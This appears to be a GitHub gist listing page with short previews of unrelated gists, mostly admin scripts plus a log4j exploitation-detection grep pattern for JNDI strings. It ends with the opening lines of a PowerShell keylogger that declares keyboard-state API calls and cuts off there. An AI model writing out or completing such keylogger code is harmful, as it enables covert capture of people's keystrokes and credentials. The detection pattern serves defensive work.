@Neo23x0
Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
https://thedfirreport.com/
https://www.zerodayinitiative.com/blog/
https://codewhitesec.blogspot.com/
https://www.digitalshadows.com/blog-and-research/
https://blog.talosintelligence.com/
https://www.riskiq.com/blog/
https://www.sekoia.io/en/blog-sekoia-io/
https://www.nextron-systems.com/blog/
https://www.microsoft.com/security/blog/
https://blog.truesec.com/
@sba923
sba923 / ConvertFrom-WingetStdout.ps1
Last active October 28, 2024 16:00
Convert winget output to PowerShell objects
# this is one of Stéphane BARIZIEN's public domain scripts
# the most recent version can be found at:
# https://gist.github.com/sba923/7924b726fd44af91d18453ee595e6548#file-convertfrom-wingetstdout-ps1
#requires -version 7
# This crude script converts the output of the winget.exe executable into an array of PowerShell objects
# usage: winget <args> | ConvertFrom-WingetStdout.ps1
#
# examples of application:
@chadmando
chadmando / get-quarantinedmessages.ps1
Created February 23, 2022 17:04
Find all quarantined messages from the last week for all users. Results are grouped by users to make finding messages for specific users easier.
# Must be connected to Exchange Online
# Gets all Quarantined messages from the last week
# Results are grouped by recipient
Get-MessageTrace -EndDate (Get-Date) -StartDate (Get-Date).adddays(-7) -Status Quarantined |
Sort-Object -Property RecipientAddress |
Format-Table -GroupBy RecipientAddress
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active April 11, 2025 22:49
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228.

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all subfolders.

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
ProductName;LicensePartNumber;LicenseSKUID
APP CONNECT IW;SPZA_IW;8f0c5670-4e56-4892-b06d-91c085d7004f
Microsoft 365 Audio Conferencing;MCOMEETADV;0c266dff-15dd-4b49-8397-2bb16070ed52
AZURE ACTIVE DIRECTORY BASIC;AAD_BASIC;2b9c8e7c-319c-43a2-a2a0-48c5c6161de7
AZURE ACTIVE DIRECTORY PREMIUM P1;AAD_PREMIUM;078d2b04-f1bd-4111-bbd4-b4b1b354cef4
AZURE ACTIVE DIRECTORY PREMIUM P2;AAD_PREMIUM_P2;84a661c4-e949-4bd2-a560-ed7766fcaf2b
AZURE INFORMATION PROTECTION PLAN 1;RIGHTSMANAGEMENT;c52ea49f-fe5d-4e95-93ba-1de91d380f89
DYNAMICS 365 CUSTOMER ENGAGEMENT PLAN ENTERPRISE EDITION;DYN365_ENTERPRISE_PLAN1;ea126fc5-a19e-42e2-a731-da9d437bffcf
DYNAMICS 365 FOR CUSTOMER SERVICE ENTERPRISE EDITION;DYN365_ENTERPRISE_CUSTOMER_SERVICE;749742bf-0d37-4158-a120-33567104deeb
DYNAMICS 365 FOR FINANCIALS BUSINESS EDITION;DYN365_FINANCIALS_BUSINESS_SKU;cc13a803-544e-4464-b4e4-6d6169a138fa
@TheFreeman193
TheFreeman193 / Updatable Help on GitHub Pages.md
Last active April 1, 2022 21:09
Using GitHub Pages as a container for PowerShell Updatable Help

Using GitHub pages as a container for PowerShell Updatable Help

Introduction

The PowerShell updatable help system is a useful, if not under-utilised, way to supply up-to-date support documentation for your module. While its implementation and ongoing support from Microsoft for native PowerShell modules is questionable (in my opinion) to begin with, it remains under-used and, in many cases, an unrecognised method of supplying updates to help documentation. This may be, in part, related to the complicated way in which PowerShell is

@cedriczirtacic
cedriczirtacic / wol.py
Created February 12, 2019 16:11
wake-on-lan using scapy
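import sys
from binascii import unhexlify
from scapy.layers.inet import IP, UDP
from scapy.packet import Raw
from scapy.sendrecv import send
# Build the 6-byte target MAC from the colon-separated argument (aa:bb:cc:dd:ee:ff)
magic = b''
for h in sys.argv[1].split(':'):
    magic += unhexlify(h)
# Magic packet: 6 bytes of 0xff followed by the MAC repeated 16 times, broadcast to UDP port 9
send(IP(dst="255.255.255.255")/UDP(dport=9)/Raw(load=(b'\xff' * 6 + magic * 16)))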
@MarkBaggett
MarkBaggett / 1 - pythons_sinister_secrets.md
Last active April 16, 2023 21:37
Come To The Darkside - Pythons Sinister Secrets
@psignoret
psignoret / Get-AzureADPSPermissions.ps1
Last active March 14, 2025 21:23
Script to list all delegated permissions and application permissions in Microsoft Entra ID
# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF
# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT.
#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" }
<#
@dasgoll
dasgoll / gist:7ca1c059dd3b3fbc7277
Created December 11, 2015 16:44
Simple Windows Keylogger using PowerShell
#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt")
{
# Signatures for API Calls
$signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]